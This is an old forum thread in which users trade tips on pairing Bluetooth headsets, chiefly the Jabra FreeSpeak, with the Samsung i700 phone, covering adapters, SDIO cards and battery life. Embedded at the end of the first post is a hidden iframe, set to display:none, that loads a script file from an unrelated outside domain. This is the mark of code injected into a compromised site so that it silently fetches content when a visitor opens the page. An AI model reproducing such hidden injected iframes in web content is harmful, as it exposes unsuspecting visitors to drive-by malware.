+ Reply to Thread

Can I use a Bluetooth headset with the i700?

The Samsung i700 does not have built-in Bluetooth, so you need some method of adapting the device support Bluetooth. The choices are a Bluetooth SD card, which the i700 should support, or a headset that comes with an adapter. In the case of the SD card approach, you will need a driver that supports the use of a headset with that card, on the i700. None exists presently. If someone discovers on, please let us know. In the case of the adapter approach, such as with the Jabra FreeSpeak with Univeral Adapter, it is most likely that a special adapter cable will be needed to allow this to work. Again, none currently are available but it is likely that they will be soon.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    NewsGuy
    pdaPhoneHome

REGISTER and join in the Discussions!!!

I can tell you that the Jabra Bluetooth adapter fits perfectly in the 2.5mm headset plug. I have the Jabra and love it. I can't wait to see the SDIO card to replace the adapter in the future!

I looked at the Jabra adaptor and headset (albiet only the box) at Best Buy today. It cost $179. Can you tell me what the battery life is really like and what the charger solution is like?
    thanks
    Joe

Talking Jabra Headset

For those of you that are interested. I just picked up the i700 Samsung and already had the Jabra Headset w/ the adapter. Everything works great, voice dial and so on. Not to bad a deal..
    Cobra

Bluetooth Handset for SDIO

The best way to get support for the Jabra (or any bluetooth handset) into the Socket SDIO card is to contact Socket and let them know that people are interested. I just did that my self and urge everyone else who is interested to do the same. Most companies will spend the time and money to develop a product enhancment if they show enough demand to justify the the cost.

To contact them go to:
    http://www.socketcom.com/contact/

I sent mine to North American Sales because the sales department usually has more pull to get product changes than the tech department does.

Good Luck!
    -TCN

Just a quick note - the Jabra Freespeak headset does indeed work fine - however, the one-touch answer does not work, since the Samsung i700 has a special extra connection on the headset port that is proprietary to Samsung. If you look at the Samsung headset that came with the phone, you will notice a little collar around the edge of the plug - that is what's different. Well, partly, anyway. Samsung also messed with the order of the 3 "sections" of the jack's shaft, too - which is why a normal stereo plug for external speakers or another stereo headset won't work without an adapter. Why they did that, I don't know. Odd.

You can still activate the headset (wake it up), then press any button on the phone to answer - but don't expect to be able to answer with the button on the headset alone at this time until there's an adapter available. I am considering hacking the end off the headset that came with the Samsung i700 and soldering it on to the Jabra's wire - but I haven't done anything with that yet.

As for battery life on the Jabra headset, I've found it'll do 3 hours of contiuous use (awake and active), and I haven't run into it running out of juice on standby yet. 3 continuous hours of talking is a lot in a day, though - for me, anyway. The box says 6 hours, but that's nonsense in my experience. 3 hours is what I got.

Hope that helps.

Is there any new information regarding these issues? Do they have an SDIO card that will enable the i700 to be Bluetooth enabled and work with the BT200 headset? Or have they bome out with an adapter that works with the i700? I just got my i700 and would like to buy a BT200, but can find a site that lets me know which one to buy and have the one touch answer function work on the headset alone. HELP!!!

Bluetooth

Is there any one who has managed to make a bluetooth head set work with the I700 other than the java that requires the adaptor?

Re: Bluetooth

Originally posted by daverae
    Is there any one who has managed to make a bluetooth head set work with the I700 other than the java that requires the adaptor?
    Not me!

I hate being obsessive.. Getting a headset to work with this phone should be a no brainer, it is an obvious need feature! I see thousands of post's and no answers.

B